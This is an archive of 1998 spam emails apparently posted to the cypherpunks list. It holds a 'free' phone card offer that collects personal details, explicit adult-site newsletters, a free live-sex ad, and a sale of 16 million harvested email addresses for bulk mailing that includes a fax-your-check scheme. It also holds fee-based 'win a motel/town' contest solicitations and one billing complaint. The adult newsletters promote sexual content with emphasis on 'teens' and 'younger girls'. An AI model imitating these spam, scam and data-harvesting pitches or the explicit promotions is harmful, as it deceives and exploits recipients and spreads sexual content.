To: subscriber@bigdally.com
Subject: >>FREE LOW RATE PHONE CARD GIVEAWAY...
Message-ID: <dyjuuud5638dhjklr8673759hf>
MIME-Version: 1.0
Content-Type: text/plain


Please respond to the following important message
Do Not hit reply
This is a onetime message


                              <><><><><><><><><><><><>

                                         "NEWS FLASH"

                              <><><><><><><><><><><><>

*************************************************************************************
LS Enterprises, LLC teams up with top player in the phone card industry.

************************************************************************************

To celebrate we would like to give you a FREE re-chargable TELECARD. 
Use it anytime, anywhere in the U.S. Pay only 19 cents per minute.


LS Enterprises, LLC has just signed a major marketing, distributor contract 
with "New Media Telecom Inc.". This means all our valued subscribers, 
Students, vacationers, Travelers, Business people, etc.. Can now reap 
huge savings on long distance calls made from home or away from home. 

Phone cards are finding their way into the hands of just about everyone 
who needs an easy and inexpensive way to make phone calls. 
Everybody can now harvest the benefits of owning their own Pre-paid 
Phone Card. 


**START SAVING MONEY ON LONG DISTANCE TODAY! 

Here's just a few of the advantages that Pre-paid phone cards offer: 

*Low domestic and international long distance rates. New Media Telecom 
phone card long distance rates are substantially lower than most payphone, 
collect or calling card rates, whether your calling across the street, or any
part of the U.S. The price is "ALWAYS" the same...ONLY 19 CENTS.

*The rate is the same no matter what the time of day, or the day of the week. 

*No phone surcharges: Toll-free access numbers let you avoid calling 
surcharges from hotels and local phone service providers. 

*No surprise charges just one low rate 24-hours a day, seven days a week.

The New Media Telecom pre-paid telecard delivers the safety and 
security that you want for yourself and loved ones. Their advanced 
communications center ensures that you can stay in touch no matter 
where you are trekking through, the middle of the city, or the middle 
of nowhere.

The average long distance phone call away from home using AT&T, Sprint, 
or MCI can cost you between 40 to 90 cents per minute. 

Now you can make calls anytime, anywhere for one flat fee from "ANY" touch
tone phone...

+Always 19/min, 24hrs/day, every day from any touch-tone phone in the 
USA, including Hawaii and Alaska. 

+No more hidden access charges. 

+No more expensive hotel phone charges. 

+No changeover or monthly fees. 

+No need to get a new calling card if you get a new phone number. 

+No more expensive pay phone calls. 

+No credit checks or applications. 

+No minimum use/time limits. 


**Consider these money saving advantages and conveniences:

>You determine the dollar balance of your card (minimum $25 or 131 
minutes). Use any touch-tone phone and major credit card or send check 
or money order. 

>Rechargeable, so the same card is good forever. 

>Saves you more money and is easier to use than other cards. 

>You are told your card balance each time you make a call. 

>When rate decreases, you will automatically receive lower rate. 


***Who can save on long distance and operator assisted calls? 

EVERYONE... Teenagers, college students, & military personnel. 

- No more expensive collect calls. 

- Roommates...No more disputes over long distance bills. 

-Anyone on vacation or on business trips, great for emergencies when 
you can't find change. 

-Useful and universal gift for all occasions.


WOULD YOU LIKE TO RECEIVE THIS CARD TODAY...FREE?? 

Everyone makes long distance calls...So why not save money in
the meantime? 

Simply click the link below to send us an email to request your FREE 
CALLING CARD.

Type "FREE CARD" in the "SUBJECT FIELD".

Please include the following information in your email message so 
we can mail your card out today!

NAME
ADDRESS
CITY, STATE, ZIP
PHONE


Request Card Now..Click Here



<End of Message>





                    ----------------------- Headers --------------------------------
Received: from  emi60.mail.smtp76 (emin60.mx. [19.81.19.148]) by 
air08.mail.com  (v33) with SMTP;   1997 08:34:37 2000
Received: from  (hd12-141.hil.compuserve.com [206.175.203.141
 by emin60.mail.m (8.8.5/8.8.5/AOL-4.0.0 with SMTP id IAA15292
 1997 08:34:08 -0400 (EDT) From: 91379499 Received: from 
mrin86.mx.by mri86.mail. (8.8.5/8.5) with SMTP id GAA0174 for 
<43231jpg@woyw.com>;  1997 06:47:01 -0600 (EST) Date: 97 06:47:01 EST
To: 43231jpg@woyw.com  
Message-ID: <4352674773897483244515@num5.com>
Comments: Authenticated sender is <3431jpg@peterville.com>
Received: from  emi60.mail.smtp76 (emin60.mx. [19.81.19.148]) by 
air08.mail.com  (v33) with SMTP;   1997 08:34:37 2000
Received: from  (hd12-141.hil.compuserve.com [206.175.203.141
 by emin60.mail.m (8.8.5/8.8.5/AOL-4.0.0 with SMTP id IAA15292
 1997 08:34:08 -0400 (EDT) From: 91379499 Received: from 
mrin86.mx.by mri86.mail. (8.8.5/8.5) with SMTP id GAA0174 for 
<43231jpg@woyw.com>;  1997 06:47:01 -0600 (EST) Date: 97 06:47:01 EST
To: 43231jpg@woyw.com  
Message-ID: <4352674773897483244515@num5.com>
Comments: Authenticated sender is <3431jpg@peterville.com>































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: telcard@worldnet.att.net
Date: Mon, 12 Jan 1998 02:13:13 -0800 (PST)
To: host@savings.com
Subject: Hi
Message-ID: <9876569865.dre98755@savings.com>
MIME-Version: 1.0
Content-Type: text/plain


When was the last time you figured out your rate on your long-distance bill?  Did you know that 62% of all
Americans are on the highest rate plan offered by their carrier?  Don't pay more than you have to for your
long-distance calls.  Telcard is now offering instant access to 14 cent per minute prepaid calling
cards!*

Compare our rates on prepaid long-distance calling cards:

     Telcard: 14 Cents per minute

     AT&T Prepaid: 29 Cents per minute

     Sprint Prepaid: 25 Cents per minute

     MCI Prepaid: 39 Cents per minute

Pay with credit card, online check, or have it charged to next month's phone bill and receive your card
within minutes!.  There's no need to wait, send this personal gift now.  Visit our site at http://www.telcard888.com  for more information or to make
a purchase.

PS.  Refer a friend and receive a FREE 10 MINUTE card with their purchase!

* Per minute of calling within the continental US





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 12 Jan 1998 04:10:08 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 9 '98
Message-ID: <19980112083222.25625.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
ABSOLUTE EROTICA
http://www.algonet.se/~absolute/
We have over 1200+ gorgeous Teens and Hardcore pics in our
galleries. We have 4 video feeds open 24h/day and a small
movie galleri. All 100% Free.

INFINITE PLEASURES
This site is  loaded with lots of free pix to say the least!
All of the categories are  plainly listed for fast  surfing.
Bingo!  They also have some great free videos! Lots of bush!
Infinite Pleasures ...... http://www.infinite-pleasures.com/

INNOCENCE LOST
"Two beautiful women whom have  agreed to "lose" their inno-
cence in the presence of our cameras.." Here we have two hot
young ladies doing a nice  little romp on a daybed.  The pix
are high  resolution, so you can see it all.  They start out
slow but then it gets going with a mutual hooter connection!
Innocence ....... http://www.firstsightimages.com/innocence/

FREE SNATCH
Hey, I guess the price is right. At this site they have well
laid out pix.  These include, anal,  blowjobs, cumshots, hot
sluts, group sex, lesbians and fucking.  Not a bad mix here!
Free Snatch ..................... http://www.freesnatch.com/

PORN CENTRAL
Way down at the bottom of the main frame you'll find lots of
free pix.  These are some good ones.  One features two babes
pouring honey on each other. Sweet and stick nipples, Yummy!
Porn Central ................... http://www.porncentral.com/

FREE CONTEST!
If you  haven't won free 3 month  membership to HardCoreSmut
yet,  today is your  last chance.  If the competition is too
tough, then just give them your money, once you're a member,
your  accountant will be the last thing on your mind.  Visit
Hardcoresmut  and click on  "Free Guided Tour" for the tour.
Email the answer (found in Hardcore Games) to this question:
"These hardcore games are the ultimate in what?"............
Send answers to ............. mailto:contest@www.usachat.com
HardCoreSmut ................... http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Just 18 ........................ http://204.244.215.7/teens/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
JAMIE WYLDE: A 36 year old Canadian amateur who has the body
of a goddess! She loves lingerie - and that is good news for
you, because she looks oohh so good in it. She loves to work
out and it shows.  Jamie could definitely keep you warm dur-
ing the cold winter!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Planet Mojo: Mojo  brings  you  the  juiciest erotic stories
weekly! Every  week  all  new  exciting  erotic  stories are
posted for your pleasure. Visit Mojo today! ................
................................. http://www.planetmojo.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?090
Pic  2 ........................... http://137.39.63.229/?091
Pic  3 ........................... http://137.39.63.229/?092
Pic  4 ........................... http://137.39.63.229/?093
Pic  5 ........................... http://137.39.63.229/?094
Pic  6 ........................... http://137.39.63.229/?095
Pic  7 ........................... http://137.39.63.229/?096
Pic  8 ........................... http://137.39.63.229/?097
Pic  9 ........................... http://137.39.63.229/?098
Pic 10 ........................... http://137.39.63.229/?099

===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Friend@public.com
Date: Mon, 12 Jan 1998 12:09:42 -0800 (PST)
To: Friend@public.com
Subject: Just Released!  16 Million!
Message-ID: <24891738_24760960>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in  excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 150+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot  less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.   We received it just
prior to finishing production work on the new CD.   We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.   We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We did not clean  these, but we did create
3 seperate files named cyber1.txt, cyber2.txt, & cyber3.txt of 100,000
addresses each. This will give all people that use the list a opportunity to
send mail to the list before deciding if their CD is all it's hyped to be.

We also included a 2+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
 
AND
 
the a sampling of CyberPromo's HOT list.

>>> NOW ONLY $149.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere..PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 
 
 _____Yes! I would like to order MILLIONS Vol. 1 email addresses
for only $149.00.
 
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
Rapture Marketing Inc.
P.O. Box 616
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: westcomm@teleport.com
Date: Mon, 12 Jan 1998 18:51:06 -0800 (PST)
To: westcomm@teleport.com
Subject: Win Property!  (just like Spitfire Grill!)	Win a 16-ROOM MOTEL on the OREGON COAST!  			--or--	Win a Tavern/Town in Austin, OREGON (see below)
Message-ID: <199801130250.SAA25582@smtp3.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


			The Contests of the Century                                           

Remember SpitFire Grill?  Well, David Persha, owner of House on
the Hill Motel in Oceanside, Oregon, is giving away his
16-room motel in a very unique contest! Each guest room has a wonderful
view of the ocean, and 8 rooms feature full kitchens. There is also a large conference room, as well as other quality amenities!

The motel sits on over 45,000 square feet of land, with the main building's having been constructed in 1990. The motel is a turnkey operation in beautiful shape, with an approximate Market Value of $1.5 Million according to an appraisal performed 4 years ago.

Mr. Persha is 71 years old and is looking for new blood to take over
his motel! The contest conforms fully to all national,international, and Oregon law, thereby making it open to anybody in the world over 18 years of age.

The Motel WILL BE yours debt-free if you submit a valid entry and the
winning 250 word essay, which will be judged for originality and wit, inspiration, creativity, expression of thought, human interest, and "the conveyance of a genuine desire to run a motel on the (Oregon) coast."

For complete rules and and entry form, please send $10 to cover the
cost of handling to Contest Guidelines, West Coast Communications, P.O. Box 7434 Salem, OR 97303. For quickest response please include email address.  

	DEADLINE FOR COMPLETED ENTRIES IS FEBRUARY 20. 1998, so ACT NOW!

Please make checks payable to West Coast Communications.


West Coast Communications
P.O. Box 7434
Salem, OR 97303

------------------------------------------------------------------------
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
		SEE BELOW FOR SPECIAL RATE on BOTH contests!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
------------------------------------------------------------------------

			"WIN-A-TOWN" IN AUSTIN, OREGON!!

Another great contest!  Like SpitFire Grill and Persha's Motel Contest (above), Leonard West is giving away his tavern in Austin, Oregon!  

Eastern Oregon . . . closely knit families, neighbors down the road. . . a great place to raise a family!  And, "WIN-a-TOWN!" (The Austin House, 225 miles east of Portland, Oregon, consists of a tavern, restaurant, grocery store, post office, garage and gas pumps.)

This is the REAL WEST.  So ruggedly picturesque, that a Marlboro ad was
shot nearby.

The property WILL BE yours if you submit the winning 250 word essay, whichwill be judged for appreciation of the establishment and its charms, "plus a willingness to honor its. . .traditions."

For complete rules and and entry form, please send $10 to cover the cost
of postage to 

West Coast Communications, 
P.O. Box 7434 
Salem, OR 97303.

you may send questions and comments to mailto:  westcomm@teleport.com for a very short time.  We are changing servers on January 10, so address will change.

For quickest response please include email address.  
------------------------------------------------------------------------
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
IF YOU WOULD LIKE INFORMATION ABOUT **both** CONTESTS, THE TOTAL CHARGE IS ONLY 15.00!  PLEASE SEND CHECK FOR 15.00 for information about ENTRY,  RULES, and DEADLINES FOR BOTH CONTESTS!  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
------------------------------------------------------------------------
  GGGG         OOO      OOO    DDDD        LL       UU UU     CCCC     K K    !!
 GG              OO OO  OO OO  DD DD       LL       UU UU   CC            K K     !!
 GG GGG     OO OO  OO OO  DD DD       LL       UU UU   CC            K K    !!
  GGGG         OOO      OOO    DDDD        LLLLL   UUU       CCCC     K   K  !!
 
West Coast Communications does not own property which is involved in
these contests. West Coast Communications is not a judge in these contests, nor are we responsible in any way for the contents of, or the contest rules.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monica_e19@hotmail.com
Date: Mon, 12 Jan 1998 15:17:48 -0800 (PST)
To: monica_e19@hotmail.com
Subject: Free Live Sex!!!
Message-ID: <0000000000.AAA000@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



 ****************Attention Video Sex Lovers*****************
Never Pay for Video Sex ever again. Brand New Totally Free Live Video Sex Website.
Come Check out unlimited Live Video sex Channels.
http://205.147.208.153/hibaby.htm

Not Forgeting our XXX rated Chatroom, photo gallery, and so much more!




















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CLAUD W WELCH" <cww7595@email.msn.com>
Date: Tue, 13 Jan 1998 14:53:01 -0800 (PST)
To: <webmasters@playgal.com>
Subject: unsolved billing problem
Message-ID: <06a0d1013010d18UPIMSSMTPUSR03@email.msn.com>
MIME-Version: 1.0
Content-Type: text/plain


I cancelled my membership prior to the end of two days. i would like a
refund.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 12 Jan 1998 17:33:08 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Jan 12 '98
Message-ID: <19980112233022.11607.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

We must  apologise to those  readers who  may have  received
Friday's edition for the last three days.  We have corrected
the problem and it will not happen again. Thank you for your
patience!

HE GIRLS!
This site calls itself  "The original She-Male, slut wonder-
land",  and it's hard not to agree.  With multiple live she-
male slut video feeds. Huge numbers of amazing shemale pics,
extra  hot stories  and so much more,  you'll just love this
site. And what's more, we have arranged a special free trial
membership for all Eureka! subscribers.  So go check it out!
HeGirls ... http://207.33.10.198/cgi-bin/gate1/pbm/he_0024/0

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
FREE 100% Swedish Porno 100%FREE
http://www.freexxxporno.com
This site is 100 % free
with lots of hardcore pictures and
over seven 
loaded pages with animated xxx gifs and
avi
videos.

XAAVIER'S WONDERLAND
They have ten images.  They are load up very quickly in your
browser as thumbnails.  Most are great pictures of beautiful
women bent over and spreading  their legs.  Just the way you
like it!  You will be  missing out if you do not  see these!
Xaavier's Wonderland ............ http://www.netamateur.com/

GALS OF PLEASURE
Scroll down the page to the beach babes, there you will find
links to some  really good looking women  enjoying the sand.
There are several other categories as well. Even a fist pic!
Gals of Pleasure .............. http://209.136.127.185/gals/

FREAK MAMA SEX SHOW CIRCUS
At this site you will find girls sucking on dicks with juice
on their faces also some anal sex images.  Not bad for free.
This website will straighten your pencil out for sure! Yeah!
Freak Mama Sex Show Circus ............ http://sexstasy.com/

4BOOBS
This website has it all. Asian, black, blonde, bondage, toys
brunette, couples, lesbian, group and hardcore!  The picture
links are listed in plain text among the  banners.  You have
got to see the blondes! There is one pulling on her panties!
4Boobs .............................. http://www.4boobs.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
20vids+Chat .. http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
TATIANA: A mysterious French 18 year old with a great ass. What more can
one ask for? She does not show her face, but the rest of her body is
completely exposed. Stop by and check out her 3-D pictures!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
The Top 50 Erotic  Stories  Sites:  Only the highest quality
erotic stories sites are listed  here. No nonsence. Just top
notch totally free free erotic stories sites................
........................... http://www.xxxstories.com/top50/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?120
Pic  2 ........................... http://137.39.63.229/?121
Pic  3 ........................... http://137.39.63.229/?122
Pic  4 ........................... http://137.39.63.229/?123
Pic  5 ........................... http://137.39.63.229/?124
Pic  6 ........................... http://137.39.63.229/?125
Pic  7 ........................... http://137.39.63.229/?126
Pic  8 ........................... http://137.39.63.229/?127
Pic  9 ........................... http://137.39.63.229/?128
Pic 10 ........................... http://137.39.63.229/?129

===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Tue, 13 Jan 1998 02:11:35 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Tue Jan 13 '98
Message-ID: <19980113081932.19877.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Tuesday's issue of Eureka!

PINKBITS
Voted the  #1 Teen (18+) site  on the web,  this is  one pay
site you  don't want  to miss out on!  Here's just one quote
from a satisfied member:  "This site delivers awesome value.
I have been a member of 3 other sites,  and this is the best
by far. It has the best pics, more live video, younger girls
and more  hardcore cumshots  than the  other sites  put tog-
ether".  And we have negotiated a special FREE trial member-
ship for Eureka subscribers, so don't take our word, go see!
PinkBits .. http://207.33.10.198/cgi-bin/gate1/pbm/pb_0024/0

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Young JAPANESE CUM QUEEN!
http://www.cutelove.com/
Cum to see HOW JAPANESE WOMEN FUCK! Free Teen Fuck Pics!!!

NUMBNUTS
For some reason you are asked to enter a name when you go to
this site.  Enter one and then way down at the bottom of the
page you will see a link to enter. Another window will open.
Then click on the freepics link.  Finally your in!  Here you
will  find a ton of great  images of all sorts.  This is one
place you have to see. One of the very few great free sites!
Numbnuts .......................... http://www.numbnuts.com/

MASSIVE HARDCORE
There are lots of pictures at this site.  There are some hot
images here!  Close ups of screwing, fingering, sex toys and
all sorts of exciting  positions.  You have got to see this!
Massive Hardcore ...... http://massive.hardcoresites.com/pk/

MOTHER RUSSIA
Now this is a great website.  No messing around with a bunch
of distracting  graphics.  Quick loading thumbnail images of
a good  looking woman.  If you like small tits check it out!
Mother Russia ........... http://anthrax.hyperlinx.net/~god/

LIZ'S HONEY'S AND HUNKS
About mid way down the page click the honey link.  There are
some ladies in here that will  really light your fire.  This
one brunette looks like a goddess! Super nice tits and bush!
Liz's Honey's .................. http://www.xconnex.net/liz/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
College teens ...... http://207.240.169.122/teens/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
ADIA: This fine Nubian princess loves  to show her body off.
Her name means, a gift from God, and believe us she is quite
a package wait till you  get  to  see her unwraped. With her
enchanting eyes, and perfect  breasts  you will quickly fall
in love!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Amateur Women Stories:  AmateurWomen.com  brings you totally
hot true sex stories and  real  pics  of hot amatuer models.
See and read what these hot honeys do in private! ..........
............................... http://www.amateurwomen.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?130
Pic  2 ........................... http://137.39.63.229/?131
Pic  3 ........................... http://137.39.63.229/?132
Pic  4 ........................... http://137.39.63.229/?133
Pic  5 ........................... http://137.39.63.229/?134
Pic  6 ........................... http://137.39.63.229/?135
Pic  7 ........................... http://137.39.63.229/?136
Pic  8 ........................... http://137.39.63.229/?137
Pic  9 ........................... http://137.39.63.229/?138
Pic 10 ........................... http://137.39.63.229/?139

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 34er5dd@ameritech.net
Date: Mon, 12 Jan 1998 18:03:49 -0800 (PST)
Subject: confidential report
Message-ID: <33085BD248C@yogya.wasantara.net.id>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is an ad. To be removed from *this* mailing list, please email
to mhr@magaygy.maga.co.id
Thank you and good luck in all you do.
